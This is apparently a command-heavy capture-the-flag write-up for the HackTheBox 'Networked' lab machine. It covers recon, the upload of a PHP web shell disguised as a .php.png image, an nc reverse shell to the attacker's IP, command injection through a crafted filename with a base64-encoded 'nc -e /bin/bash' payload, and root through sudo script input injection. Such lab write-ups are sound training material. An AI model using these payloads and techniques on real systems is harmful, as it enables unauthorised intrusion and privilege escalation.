HackTheBox-Networked

Crazy:~/HackThebox/Networked$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0 10.10.10.146[sudo] crazyinside 的密码：Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-08-22 02:59:55 GMTInitiating SYN Stealth ScanScanning 1 hosts [131070 ports/host]Discovered open port 80/tcp on 10.10.10.146                                    Discovered open port 22/tcp on 10.10.10.146 
Crazy:~/HackThebox/Networked$ sudo nmap -sC -sV 10.10.10.146 -p22,80 -oN Networked    Starting Nmap 7.92SVN ( https://ParrotOS.org ) at 2022-08-22 11:02 CSTNmap scan report for 10.10.10.146Host is up (0.17s latency).
PORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)| ssh-hostkey: |   2048 2275d7a74f81a7af5266e52744b1015b (RSA)|   256 2d6328fca299c7d435b9459a4b38f9c8 (ECDSA)|_  256 73cda05b84107da71c7c611df554cfc4 (ED25519)80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service detection performed. Please report any incorrect results at https://ParrotOS.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 11.79 secondszsh: segmentation fault  sudo nmap -sC -sV 10.10.10.146 -p22,80 -oN Networked

<html><body>Hello mate, we're building the new FaceMash!</br>Help by funding us and be the new Tyler&Cameron!</br>Join us at the pool party this Sat to get a glimpse<!-- upload and gallery not yet linked --></body></html>

Crazy:~/HackThebox/Networked$ dirsearch -u http://10.10.10.146/     
  _|. _ _  _  _  _ _|_    v0.4.2 (_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/crazyinside/.dirsearch/reports/10.10.10.146/-_22-08-22_11-03-55.txt
Error Log: /home/crazyinside/.dirsearch/logs/errors-22-08-22_11-03-55.log
Target: http://10.10.10.146/
[11:03:55] Starting: [11:04:02] 403 -  216B  - /.htaccess.orig[11:04:02] 403 -  216B  - /.htaccess.save[11:04:03] 403 -  218B  - /.htaccess.sample[11:04:03] 403 -  216B  - /.htaccess_orig[11:04:03] 403 -  217B  - /.htaccess_extra[11:04:03] 403 -  214B  - /.htaccessOLD[11:04:03] 403 -  214B  - /.htaccessBAK[11:04:03] 403 -  214B  - /.htaccess_sc[11:04:03] 403 -  215B  - /.htaccessOLD2[11:04:03] 403 -  216B  - /.htaccess.bak1[11:04:03] 403 -  206B  - /.htm[11:04:03] 403 -  213B  - /.ht_wsr.txt[11:04:03] 403 -  207B  - /.html[11:04:03] 403 -  216B  - /.htpasswd_test[11:04:03] 403 -  212B  - /.htpasswds[11:04:03] 403 -  213B  - /.httr-oauth[11:04:33] 301 -  235B  - /backup  ->  http://10.10.10.146/backup/[11:04:33] 200 -  885B  - /backup/[11:04:35] 403 -  210B  - /cgi-bin/[11:04:48] 200 -  229B  - /index.php[11:04:48] 200 -  229B  - /index.php/login/[11:05:00] 200 -    1KB - /photos.php[11:05:16] 200 -  169B  - /upload.php[11:05:16] 301 -  236B  - /uploads  ->  http://10.10.10.146/uploads/[11:05:16] 200 -    2B  - /uploads/

<?phprequire '/var/www/html/lib.php';
define("UPLOAD_DIR", "/var/www/html/uploads/");#上传路径
if( isset($_POST['submit']) ) {  if (!empty($_FILES["myFile"])) {    $myFile = $_FILES["myFile"];
    if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {#文件大小不许大于60000      echo '<pre>Invalid image file.</pre>';      displayform();    }
    if ($myFile["error"] !== UPLOAD_ERR_OK) {        echo "<p>An error occurred.</p>";        displayform();        exit;    }
    //$name = $_SERVER['REMOTE_ADDR'].'-'. $myFile["name"];    list ($foo,$ext) = getnameUpload($myFile["name"]); #白名单校验    $validext = array('.jpg', '.png', '.gif', '.jpeg');    $valid = false;    foreach ($validext as $vext) {      if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {        $valid = true;      }    }
    if (!($valid)) {      echo "<p>Invalid image file</p>";      displayform();      exit;    }    $name = str_replace('.','_',$_SERVER['REMOTE_ADDR']).'.'.$ext;
    $success = move_uploaded_file($myFile["tmp_name"], UPLOAD_DIR . $name);    if (!$success) {        echo "<p>Unable to save file.</p>";        exit;    }    echo "<p>file uploaded, refresh gallery</p>";
    // set proper permissions on the new file    chmod(UPLOAD_DIR . $name, 0644);  }} else {  displayform();}?>

<?php echo "START<br/><br/>nnn"; system($_GET["cmd"]); echo "nnn<br/><br/>END"; ?>

http://10.10.10.146/uploads/10_10_16_3.php.png?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%2010.10.16.3%201337%20%3E%2Ftmp%2Ff

Crazy:~/HackThebox/Networked/backup$ nc -lvnp 1337           listening on [any] 1337 ...connect to [10.10.16.3] from (UNKNOWN) [10.10.10.146] 55794sh: no job control in this shellsh-4.2$ ididuid=48(apache) gid=48(apache) groups=48(apache)sh-4.2$ python3 -c 'import pty; pty.spawn("/bin/bash")'python3 -c 'import pty; pty.spawn("/bin/bash")'sh: python3: command not foundsh-4.2$ script -qc /bin/bash /dev/nullscript -qc /bin/bash /dev/nullbash-4.2$ ls10_10_16_3.php.png  127_0_0_2.png  127_0_0_4.png127_0_0_1.png       127_0_0_3.png  index.htmlbash-4.2$

bash-4.2$ cd /homebash-4.2$ lsgulybash-4.2$ cd gultbash: cd: gult: No such file or directorybash-4.2$ cd gulybash-4.2$ lscheck_attack.php  crontab.guly  user.txtbash-4.2$ cat user.txtcat: user.txt: Permission deniedbash-4.2$ cat check_attack.php<?phprequire '/var/www/html/lib.php';$path = '/var/www/html/uploads/';$logpath = '/tmp/attack.log';$to = 'guly';$msg= '';$headers = "X-Mailer: check_attack.phprn";
$files = array();$files = preg_grep('/^([^.])/', scandir($path));
foreach ($files as $key => $value) {        $msg='';  if ($value == 'index.html') {        continue;  }  #echo "-------------n";
  #print "check: $valuen";  list ($name,$ext) = getnameCheck($value);  $check = check_ip($name,$value);
  if (!($check[0])) {    echo "attack!n";    # todo: attach file    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);
    exec("rm -f $logpath");    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");    echo "rm -f $path$valuen";    mail($to, $msg, $msg, $headers, "-F$value");  }}
?>bash-4.2$

exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");

exec("nohup /bin/rm -f /var/www/html/uploads/$value > /dev/null 2>&1 &");

 $check = check_ip($name,$value);
  if (!($check[0])) {    echo "attack!n";    # todo: attach file    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);
    exec("rm -f $logpath");    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");    echo "rm -f $path$valuen";    mail($to, $msg, $msg, $headers, "-F$value");  }}

exec("nohup /bin/rm -f /var/www/html/uploads/a;echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE2LjMgMTMzOAo= |base64 -d|sh > /dev/null 2>&1 &");

function check_ip($prefix,$filename) {  //echo "prefix: $prefix - fname: $filename<br>n";  $ret = true;  if (!(filter_var($prefix, FILTER_VALIDATE_IP))) {    $ret = false;    $msg = "4tt4ck on file ".$filename.": prefix is not a valid ip ";  } else {    $msg = $filename;  }  return array($ret,$msg);}

bash-4.2$ touch "a;echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE2LjMgMTMzOAo= |base64 -d|sh;b"bash-4.2$ ls10_10_16_3.php.png127_0_0_1.png127_0_0_2.png127_0_0_3.png127_0_0_4.pngtouch "a;echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE2LjMgMTMzOAo= |base64 -d|sh;b"index.htmlbash-4.2$

Crazy:~/HackThebox/Networked/backup$ nc -lvnp 1338listening on [any] 1338 ...connect to [10.10.16.3] from (UNKNOWN) [10.10.10.146] 44432iduid=1000(guly) gid=1000(guly) groups=1000(guly)python3 -c 'import pty; pty.spawn("/bin/bash")'iduid=1000(guly) gid=1000(guly) groups=1000(guly)lscheck_attack.phpcrontab.gulyuser.txtcat user.txt526cfc2.........................script -qc /bin/bash /dev/null[guly@networked ~]$ lscheck_attack.php  crontab.guly  user.txt[guly@networked ~]$

[guly@networked ~]$ sudo -lMatching Defaults entries for guly on networked:    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",    secure_path=/sbin:/bin:/usr/sbin:/usr/bin
User guly may run the following commands on networked:    (root) NOPASSWD: /usr/local/sbin/changename.sh[guly@networked ~]$ cat /usr/local/sbin/changename.sh#!/bin/bash -pcat > /etc/sysconfig/network-scripts/ifcfg-guly << EoFDEVICE=guly0ONBOOT=noNM_CONTROLLED=noEoF
regexp="^[a-zA-Z0-9_ /-]+$"
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do        echo "interface $var:"        read x        while [[ ! $x =~ $regexp ]]; do                echo "wrong input, try again"                echo "interface $var:"                read x        done        echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-gulydone  /sbin/ifup guly0[guly@networked ~]$

[guly@networked ~]$ cat /etc/sysconfig/network-scripts/ifcfg-gulyDEVICE=guly0ONBOOT=noNM_CONTROLLED=noNAME=ps /tmp/fooPROXY_METHOD=asodihBROWSER_ONLY=asdoihBOOTPROTO=asdoih[guly@networked ~]$

[guly@networked ~]$ sudo /usr/local/sbin/changename.shinterface NAME:idinterface PROXY_METHOD:whoamiinterface BROWSER_ONLY:idinterface BOOTPROTO:idERROR     : [/etc/sysconfig/network-scripts/ifup-eth] Device guly0 does not seem to be present, delaying initialization.[guly@networked ~]$ sudo /usr/local/sbin/changename.shinterface NAME:a idinterface PROXY_METHOD:a whoamiinterface BROWSER_ONLY:a pwdinterface BOOTPROTO:a whoamiuid=0(root) gid=0(root) groups=0(root)root/etc/sysconfig/network-scriptsrootuid=0(root) gid=0(root) groups=0(root)root/etc/sysconfig/network-scriptsrootERROR     : [/etc/sysconfig/network-scripts/ifup-eth] Device guly0 does not seem to be present, delaying initialization.[guly@networked ~]$ sudo /usr/local/sbin/changename.shinterface NAME:a idinterface PROXY_METHOD:a /bin/bashinterface BROWSER_ONLY:a idinterface BOOTPROTO:a iduid=0(root) gid=0(root) groups=0(root)[root@networked network-scripts]# cat /root/root.txt0a8e................................